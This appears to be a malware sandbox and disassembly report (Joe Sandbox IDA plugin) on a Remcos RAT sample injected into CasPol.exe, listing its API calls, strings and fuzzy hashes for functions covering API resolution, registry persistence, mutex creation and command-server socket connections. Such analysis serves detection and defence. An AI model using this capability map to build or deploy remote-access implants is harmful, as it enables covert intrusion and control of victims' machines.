                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleLibraryLoadModule
                                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                              • API String ID: 384173800-625181639
                                                                              • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                              • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                              • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                              • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                              • Sleep.KERNELBASE(00000BB8), ref: 0040E603
                                                                              • ExitProcess.KERNEL32 ref: 0040E672
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                                              • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                              • API String ID: 2281282204-3981147832
                                                                              • Opcode ID: d0b700c6543029a90e3e86d7f1c8fe1d49ffd33392616e1de0625f56461d18dd
                                                                              • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                              • Opcode Fuzzy Hash: d0b700c6543029a90e3e86d7f1c8fe1d49ffd33392616e1de0625f56461d18dd
                                                                              • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?), ref: 00404946
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7
                                                                              Strings
                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Create$EventLocalThreadTime
                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                              • API String ID: 2532271599-1507639952
                                                                              • Opcode ID: 99c7677557354231c88b4d57898418f8e8d9318d7f2a86bda15906334fb82310
                                                                              • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                              • Opcode Fuzzy Hash: 99c7677557354231c88b4d57898418f8e8d9318d7f2a86bda15906334fb82310
                                                                              • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                              APIs
                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                              • String ID:
                                                                              • API String ID: 1815803762-0
                                                                              • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                              • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                              • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                              • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                              APIs
                                                                              • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                              • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Name$ComputerUser
                                                                              • String ID:
                                                                              • API String ID: 4229901323-0
                                                                              • Opcode ID: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                                                                              • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                              • Opcode Fuzzy Hash: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                                                                              • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: recv
                                                                              • String ID:
                                                                              • API String ID: 1507349165-0
                                                                              • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                              • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                              • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                              • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790
                                                                                • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                              • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                              • API String ID: 2830904901-3665108517
                                                                              • Opcode ID: 293d29213af4237a347d90d2e7037e23f195ebf22a6cfc67f66219c717e1d0c6
                                                                              • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                              • Opcode Fuzzy Hash: 293d29213af4237a347d90d2e7037e23f195ebf22a6cfc67f66219c717e1d0c6
                                                                              • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                              Control-flow Graph

APIs
• Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
• WSAGetLastError.WS2_32 ref: 00414249
• Sleep.KERNELBASE(00000000,00000002), ref: 00414B88
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: Sleep$ErrorLastLocalTime
• String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
• API String ID: 524882891-2450167416

Control-flow Graph (graph not rendered)

APIs
• connect.WS2_32(?,?,?), ref: 004042A5
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
• WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
Similarity
• API ID: CreateEvent$ErrorLastLocalTimeconnect
• String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... | $
• API String ID: 994465650-1784135002

Control-flow Graph (graph not rendered)

APIs
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
• SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
• CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
• closesocket.WS2_32(000000FF), ref: 0040481F
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
• CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
• CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
• SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
• CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
Similarity
• API ID: CloseEventHandle$ObjectSingleWait$closesocket
• String ID:
• API String ID: 3658366068-0

Control-flow Graph of function 40c89e (graph not rendered)
APIs
• GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
Similarity
• API ID: LongNamePath
• String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
• API String ID: 82841172-425784914

Control-flow Graph (graph not rendered)

APIs
  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
  • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
  • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
  • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
• StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
Similarity
• API ID: CloseCurrentOpenProcessQueryValue
• String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
• API String ID: 1866151309-2070987746

Control-flow Graph of function 4126d2 (graph not rendered)
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
• RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
• RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
Similarity
• API ID: CloseCreateValue
• String ID: HgF$pth_unenc
• API String ID: 1818849710-3662775637

Control-flow Graph of function 4127d5 (graph not rendered)
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
• RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
• RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
Similarity
• API ID: CloseCreateValue
• String ID: TUF
• API String ID: 1818849710-3431404234

Control-flow Graph of function 4041f1 (graph not rendered)
APIs
• socket.WS2_32(?,00000001,00000006), ref: 00404212
  • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
Similarity
• API ID: CreateEventStartupsocket
• String ID:
• API String ID: 1953588214-2740779761

Control-flow Graph of function 413f9a (graph not rendered)
APIs
• getaddrinfo.WS2_32(00000000,00000000,00000000,,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
• WSASetLastError.WS2_32(00000000), ref: 00413FC1
  • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
  • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
  • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
  • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
  • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
  • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
  • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
  • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
Similarity
• API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
• String ID:
• API String ID: 1170566393-2740779761

Control-flow Graph of function 40bed7 (graph not rendered)
APIs
• CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
• GetLastError.KERNEL32 ref: 0040BEF1
Similarity
• API ID: CreateErrorLastMutex
• String ID: (CG
• API String ID: 1925916568-4210230975

Control-flow Graph of function 412513 (graph not rendered)
APIs
• RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
• RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3677997916-0
                                                                              • Opcode ID: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                                                                              • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                              • Opcode Fuzzy Hash: fb0399a994eaa7e17bc6b867fc74c46ca573e9fca6dfde94924c7a451072e484
                                                                              • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                              • RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3677997916-0
                                                                              • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                              • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                              • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                              • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                              • RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3677997916-0
                                                                              • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                              • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                              • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                              • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _wcslen
                                                                              • String ID: xAG
                                                                              • API String ID: 176396367-2759412365
                                                                              • Opcode ID: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                                                                              • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                              • Opcode Fuzzy Hash: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                                                                              • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                              APIs
                                                                              • _free.LIBCMT ref: 0044B9DF
                                                                                • Part of subcall function 00446AFF: HeapAlloc.KERNEL32(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                              • RtlReAllocateHeap.NTDLL(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Heap$AllocAllocate_free
                                                                              • String ID:
                                                                              • API String ID: 2447670028-0
                                                                              • Opcode ID: 562d4c1fddf21a80c38cfe2e0300bdc28a7a71d666f3b820161c9f5a7c2f7eb0
                                                                              • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                                                                              • Opcode Fuzzy Hash: 562d4c1fddf21a80c38cfe2e0300bdc28a7a71d666f3b820161c9f5a7c2f7eb0
                                                                              • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                                                                              APIs
                                                                              • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Startup
                                                                              • String ID:
                                                                              • API String ID: 724789610-0
                                                                              • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                              • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                              • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                              • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: send
                                                                              • String ID:
                                                                              • API String ID: 2809346765-0
                                                                              • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                              • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                              • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                              • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                              APIs
                                                                              • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
